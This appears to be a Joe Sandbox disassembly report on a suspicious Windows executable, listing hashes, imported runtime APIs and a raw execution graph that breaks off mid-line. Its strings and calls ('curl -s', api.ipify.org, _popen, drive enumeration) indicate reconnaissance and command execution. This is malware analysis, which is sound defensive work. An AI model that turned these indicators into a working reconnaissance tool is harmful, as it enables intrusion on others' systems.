                                        • Instruction ID: 9e4ccc10e85b89d04c1774bd541521197e840444184102c2ccc48d8876d5c8e3
                                        • Opcode Fuzzy Hash: 32f99a87d3a5ab311aaa68574cd87bda19d4f3e88d22cf0ee314562ff2212286
                                        • Instruction Fuzzy Hash: 6E714527A1DAC191EA65CB25E4A43BE6760FB85B85F188232CE9EC3764CF3CD445C310
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC3329
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF670FC3349
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC3359
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC33B5
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC33DF
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC340E
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF670FC3459
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF670FC3460
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF670FC346D
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID:
                                        • API String ID: 3107587312-0
                                        • Opcode ID: 4a2502ecc8ca070d43367042e3d12e437e7251f46653fbf343002d1584a05c5c
                                        • Instruction ID: 9f371351a534e003aeba3ffea8b39ba08921360b5899aef2a96e78ad5f293130
                                        • Opcode Fuzzy Hash: 4a2502ecc8ca070d43367042e3d12e437e7251f46653fbf343002d1584a05c5c
                                        • Instruction Fuzzy Hash: 49512D33618AC196EB258F19E4D023DA7A0FB95B95B158636CE4EC37A0CF2ED4468310
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: memset$_invalid_parameter_noinfo_noreturnlocaleconvmalloc
                                        • String ID: Security$System
                                        • API String ID: 4120556116-2661570791
                                        • Opcode ID: 973c031a5a8fc9c7a0768d41abd9d7aba41af98240d1dc33b51a877cc5d0116a
                                        • Instruction ID: 7e209c3996a270b541b8387cf0797853874536a7cd4d7baf5c0e625542039b12
                                        • Opcode Fuzzy Hash: 973c031a5a8fc9c7a0768d41abd9d7aba41af98240d1dc33b51a877cc5d0116a
                                        • Instruction Fuzzy Hash: D3817732A18BC18AE760CF25E8403AE77A0F799B98F148225DE8D87B95DF3CD581C710
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: \java.exe
                                        • API String ID: 2016347663-3009632800
                                        • Opcode ID: 6633e6177a3443b740a176732380e6e2b1cc47606f2338d7d892142ca5fe476f
                                        • Instruction ID: 518314298fe876c4f0e631593ed8ffe58086389bab84fe3f752d0d0c1a5b4e06
                                        • Opcode Fuzzy Hash: 6633e6177a3443b740a176732380e6e2b1cc47606f2338d7d892142ca5fe476f
                                        • Instruction Fuzzy Hash: D6419D63B29A81A5EA14DB15E4052BE6355EB48BE4F940732DE6DCBBD5DF3CD0818320
                                        APIs
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF670FC1568), ref: 00007FF670FC3D6A
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF670FC1568), ref: 00007FF670FC3D79
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000008,?,00007FF670FC1568), ref: 00007FF670FC3DAD
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF670FC1568), ref: 00007FF670FC3DB4
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF670FC1568), ref: 00007FF670FC3DC3
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC3DEE
                                        Strings
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: curl -s
                                        • API String ID: 2016347663-820363595
                                        • Opcode ID: 2347ac5d59e4b872f78fe3b8aab0134d24eb6132abb724e69a6a8a2b476d51d7
                                        • Instruction ID: 7d045ffb6f25a2ff6631af4625e9f780c1b2c9eb4b9ccf585714a2bcfe0e0fe4
                                        • Opcode Fuzzy Hash: 2347ac5d59e4b872f78fe3b8aab0134d24eb6132abb724e69a6a8a2b476d51d7
                                        • Instruction Fuzzy Hash: 6B41A163B2DBC6A5EE109B16A5063AE6255EB44BD0F540732DE6ECB795DF3CE081C310
                                        APIs
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturnmemmove$Concurrency::cancel_current_task$?out@?$codecvt@_Mbstatet@@Mbstatet@@@std@@
                                        • String ID:
                                        • API String ID: 525765215-0
                                        • Opcode ID: c6cdeb64eca4f1f961e730b4080fa50bdbe3b7e8eb71886a262a1a5eee0e9623
                                        • Instruction ID: 29998565619bcc52f538fda49f822d0493c1ad15d81a430305710fc44992f8aa
                                        • Opcode Fuzzy Hash: c6cdeb64eca4f1f961e730b4080fa50bdbe3b7e8eb71886a262a1a5eee0e9623
                                        • Instruction Fuzzy Hash: 55B1AE63F2CB85AAEB40CBA4D8452AE2362EB59B98F404335DE5D97B99DF3CD045C310
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB53E
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB58D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB5CC
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF670FCB618
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB665
                                        Strings
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: type_error
                                        • API String ID: 450636425-1406221190
                                        • Opcode ID: 105f28b83217c533a0621a35a7ac762c2119fe9a0180d406f36b6523ef19bbb5
                                        • Instruction ID: 360d51983903ebe99ddd854a003cd0a57c975fca826cf000f00c719eafd3e15e
                                        • Opcode Fuzzy Hash: 105f28b83217c533a0621a35a7ac762c2119fe9a0180d406f36b6523ef19bbb5
                                        • Instruction Fuzzy Hash: A4519F63F2CA82A9EB00DB74D4513AD2321EB457A4F505336EE6CD3B99DF2CE4858310
                                        APIs
                                        Similarity
                                        • API ID: memmove$?uncaught_exceptions@std@@Concurrency::cancel_current_taskD@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 3994297871-0
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCBDD2
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCBE21
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCBE60
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF670FCBEB0
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCBEFD
                                        Strings
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: other_error
                                        • API String ID: 450636425-896093151
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCC0C2
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCC111
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCC150
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF670FCC1A0
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCC1ED
                                        Strings
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: type_error
                                        • API String ID: 450636425-1406221190
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemset
                                        • String ID: https://api.ipify.org
                                        • API String ID: 1489393663-2202801394
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: Application$Security
                                        • API String ID: 2075926362-3957089671
                                        APIs
                                        • ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF670FC21C0
                                          • Part of subcall function 00007FF670FCD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF670FC3975), ref: 00007FF670FCDA0A
                                        • ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF670FC2216
                                        • ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF670FC2232
                                        • ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF670FC2242
                                        • ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF670FC2251
                                        • ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF670FC2265
                                        Similarity
                                        • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
                                        • String ID:
                                        • API String ID: 3292048638-0
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: ExceptionThrow
                                        • String ID: Security$System
                                        • API String ID: 432778473-2661570791
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: ExceptionThrow$_invalid_parameter_noinfo_noreturn
                                        • String ID: System
                                        • API String ID: 2822070131-3470857405
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC2B12
                                          • Part of subcall function 00007FF670FCD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF670FC3975), ref: 00007FF670FCDA0A
                                          • Part of subcall function 00007FF670FC11C0: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF670FC11CB
                                        • memmove.VCRUNTIME140 ref: 00007FF670FC2B33
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC2B4F
                                          • Part of subcall function 00007FF670FC1120: __std_exception_copy.VCRUNTIME140 ref: 00007FF670FC1164
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC2BB5
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC2BBE
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_iostream@Concurrency::cancel_current_taskXlength_error@std@@__std_exception_copy_invalid_parameter_noinfo_noreturnmallocmemmove
                                        • String ID:
                                        • API String ID: 144170543-0
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-3916222277
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: __current_exception__current_exception_contextterminate
                                        • String ID: csm
                                        • API String ID: 2542180945-1018135373
                                        APIs
                                        Similarity
                                        • API ID: memmovememset
                                        • String ID:
                                        • API String ID: 1288253900-0
                                        APIs
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID:
                                        • API String ID: 2075926362-0
                                        APIs
                                        • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3682
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC36C0
                                        • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC36CA
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC36FF
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 2016347663-0
                                        APIs
                                        • memmove.VCRUNTIME140(00000131,00000000,?,00007FF670FC577C,?,?,?,?,?,?,?,?,?,?,?,00000131), ref: 00007FF670FCC9FD
                                        Similarity
                                        • API ID: memmove
                                        • String ID:
                                        • API String ID: 2162964266-0
                                        APIs
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 2016347663-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 1247048853-0
                                        • Opcode ID: 6b4d8e943c827b092aac02f0c4dc6a22bc2bdbd620c48232d5eaa4421c51ee35
                                        • Instruction ID: bcdb8dd90446eda68124a2b5c3b2875aa434af3e0fd8101853b70d996693cd36
                                        • Opcode Fuzzy Hash: 6b4d8e943c827b092aac02f0c4dc6a22bc2bdbd620c48232d5eaa4421c51ee35
                                        • Instruction Fuzzy Hash: 6721F763A1E7D665FA259B51A40137E2254AB05BE4F180B31DE6CC7BC6DF3CA4928320
                                        APIs
                                          • Part of subcall function 00007FF670FCCCF0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FCCE9A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,Security,System,?,?,?,00007FF670FCAFB7), ref: 00007FF670FCAA94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: Security$System
                                        • API String ID: 73155330-2661570791
                                        • Opcode ID: 50d799d0bf03d6ab0226f341a1398c31d653080fcac9ab1f781c5d39ff046ff4
                                        • Instruction ID: 2c7f4c1b3a9abc46fe6db9f3986f18e6200a51ccd82b52cf30abb9b6bb73ee17
                                        • Opcode Fuzzy Hash: 50d799d0bf03d6ab0226f341a1398c31d653080fcac9ab1f781c5d39ff046ff4
                                        • Instruction Fuzzy Hash: 1BE18123A29AC1A4EB14CB65D4422BE67A1FB44B8CF449636CF5D97789DF3CE490C350
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID: System
                                        • API String ID: 118556049-3470857405
                                        • Opcode ID: 4fc0c7eaf7f74b3e870daa3c842a4730caff543050ed0bc9254fe8d7cb5bb188
                                        • Instruction ID: 50956003063484d3112576ad19d9b0c67fa9a24a10dac180f8713719755ff9ec
                                        • Opcode Fuzzy Hash: 4fc0c7eaf7f74b3e870daa3c842a4730caff543050ed0bc9254fe8d7cb5bb188
                                        • Instruction Fuzzy Hash: 8741D023A19BC595EE108F2995011BA6750EB49BA8F18A731CEAE837D5EF3CE4C1C250
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC8661
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC8710
                                          • Part of subcall function 00007FF670FCD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF670FC3975), ref: 00007FF670FCDA0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: System
                                        • API String ID: 1934640635-3470857405
                                        • Opcode ID: 8e9c648aaf9993d6eed02413e51bf5f09641b046bbebabcfcb4fae47b2ed004d
                                        • Instruction ID: 3ba5d62c3679457129793b7be3033e48e1c477d8e623c434c39b72e7dffc4012
                                        • Opcode Fuzzy Hash: 8e9c648aaf9993d6eed02413e51bf5f09641b046bbebabcfcb4fae47b2ed004d
                                        • Instruction Fuzzy Hash: 3B41C333629B8296EA149B12E94116AB7A4FB587C0F544336DE8DC3B95DF7CD492C310
                                        APIs
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FCCCE8
                                          • Part of subcall function 00007FF670FCD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF670FC3975), ref: 00007FF670FCDA0A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCCCE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: Security
                                        • API String ID: 1934640635-1022211991
                                        • Opcode ID: 940fbb8c13e06505b1f8ccc2fbea7ba20c18ea880b94d17af8005ee8a0573366
                                        • Instruction ID: dcca19d778d29906b0087520d06923e81677acd40aae73c2594b084e847a761b
                                        • Opcode Fuzzy Hash: 940fbb8c13e06505b1f8ccc2fbea7ba20c18ea880b94d17af8005ee8a0573366
                                        • Instruction Fuzzy Hash: F0319C23B286C5A5EA14CF2994023BA7650EB45BA4F495631CE2DD77C5DF3CE482C350
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: _dsignmemset
                                        • String ID: 0$null
                                        • API String ID: 210716287-2239106201
                                        • Opcode ID: 449d20cf74046f8510eab42154efe2d25a62bb869c27897a45daba319c9707b5
                                        • Instruction ID: 296cb03a4a14df5eb5001cda9c4e8ff84260df6374a70543bfa64d8a7ddfc96c
                                        • Opcode Fuzzy Hash: 449d20cf74046f8510eab42154efe2d25a62bb869c27897a45daba319c9707b5
                                        • Instruction Fuzzy Hash: AB318D2362CAC595D6618F29E0413EAB360FF84B84F449222EF8D93755EF3CE585C710

                                        Execution Graph

                                        Execution Coverage:22.2%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:1692
                                        Total number of Limit Nodes:17
_invalid_parameter_noinfo_noreturn 4794->4801 4797 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4795->4797 4796 7ff65e1f2d60 ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD 4796->4813 4800 7ff65e1f2f93 4797->4800 4799 7ff65e1fda34 _Receive_impl free 4798->4799 4799->4795 4825 7ff65e1f20b0 4800->4825 4803 7ff65e1f3090 4801->4803 4802 7ff65e1f2ef8 4806 7ff65e1f3095 4802->4806 5178 7ff65e1f2a40 4802->5178 5200 7ff65e1f12c0 4803->5200 4804 7ff65e1f2e2c memmove 4804->4813 4805 7ff65e1f2fa7 4805->4803 4811 7ff65e1f2a40 13 API calls 4805->4811 4812 7ff65e1f12c0 Concurrency::cancel_current_task 11 API calls 4806->4812 4816 7ff65e1f2fbe 4811->4816 4817 7ff65e1f309b 4812->4817 4813->4794 4813->4796 4813->4802 4813->4804 4813->4805 5115 7ff65e1f35a0 4813->5115 5135 7ff65e1f38c0 4813->5135 5158 7ff65e1f3710 4813->5158 4815 7ff65e1f2f0f 4818 7ff65e1f2f48 4815->4818 4819 7ff65e1f2f43 4815->4819 4821 7ff65e1f2fee _invalid_parameter_noinfo_noreturn 4815->4821 4816->4818 4820 7ff65e1f2ff5 4816->4820 4816->4821 4818->4795 4818->4798 4824 7ff65e1f3039 _invalid_parameter_noinfo_noreturn 4818->4824 4822 7ff65e1fda34 _Receive_impl free 4819->4822 4823 7ff65e1fda34 _Receive_impl free 4820->4823 4821->4820 4822->4818 4823->4818 4824->4794 4826 7ff65e1f20d1 4825->4826 4827 7ff65e1f2107 4825->4827 4829 7ff65e1f218d _invalid_parameter_noinfo_noreturn 4826->4829 4830 7ff65e1fda34 _Receive_impl free 4826->4830 4828 7ff65e1f2150 4827->4828 4827->4829 4831 7ff65e1f2148 4827->4831 4828->4653 4830->4827 4832 7ff65e1fda34 _Receive_impl free 4831->4832 4832->4828 4834 7ff65e1f34a0 8 API calls 4833->4834 4835 7ff65e1f14b3 4834->4835 4836 7ff65e1f1556 4835->4836 4840 7ff65e1f14d3 memmove memmove memmove 4835->4840 5226 7ff65e1f3c80 4836->5226 4839 7ff65e1f1568 4841 7ff65e1f15d7 _popen 4839->4841 4842 7ff65e1f15d2 4839->4842 4846 7ff65e1f15cb _invalid_parameter_noinfo_noreturn 4839->4846 4840->4839 4843 7ff65e1f16a0 fgets 4841->4843 4844 7ff65e1f1616 
4841->4844 4847 7ff65e1fda34 _Receive_impl free 4842->4847 4845 7ff65e1f170e _pclose 4843->4845 4856 7ff65e1f16c4 4843->4856 4848 7ff65e1f34a0 8 API calls 4844->4848 4849 7ff65e1f1670 4845->4849 4850 7ff65e1f1633 4845->4850 4846->4842 4847->4841 4848->4850 4852 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4849->4852 4850->4849 4851 7ff65e1f166b 4850->4851 4853 7ff65e1f1776 _invalid_parameter_noinfo_noreturn 4850->4853 4854 7ff65e1fda34 _Receive_impl free 4851->4854 4855 7ff65e1f167f 4852->4855 4854->4849 4855->4665 5220 7ff65e1f3200 4856->5220 4858 7ff65e1f16f7 fgets 4858->4845 4858->4856 4860 7ff65e1f34a0 8 API calls 4859->4860 4861 7ff65e1f17e0 GetLogicalDriveStringsA 4860->4861 4862 7ff65e1f1bc2 4861->4862 4863 7ff65e1f1802 4861->4863 4865 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4862->4865 4863->4862 4864 7ff65e1f180d memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 4863->4864 4868 7ff65e1f1a75 4864->4868 4882 7ff65e1f18ba 4864->4882 4866 7ff65e1f1bd4 4865->4866 4887 7ff65e1f85b0 4866->4887 4867 7ff65e1f34a0 8 API calls 4869 7ff65e1f18e3 GetDriveTypeA 4867->4869 4870 7ff65e1f1b07 4868->4870 4871 7ff65e1f30a0 9 API calls 4868->4871 4869->4882 4872 7ff65e1f1b42 4870->4872 4876 7ff65e1f30a0 9 API calls 4870->4876 4871->4870 4874 7ff65e1f1b83 4872->4874 4877 7ff65e1f1b7e 4872->4877 4880 7ff65e1f1b77 _invalid_parameter_noinfo_noreturn 4872->4880 4875 7ff65e1f2870 _Receive_impl 4 API calls 4874->4875 4878 7ff65e1f1bae ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 4875->4878 4876->4872 4881 7ff65e1fda34 _Receive_impl free 4877->4881 4878->4862 4879 7ff65e1f3ac0 9 API calls 4879->4882 4880->4877 4881->4874 4882->4867 4882->4868 4882->4879 4883 7ff65e1f1a67 _invalid_parameter_noinfo_noreturn 4882->4883 4884 7ff65e1fda34 
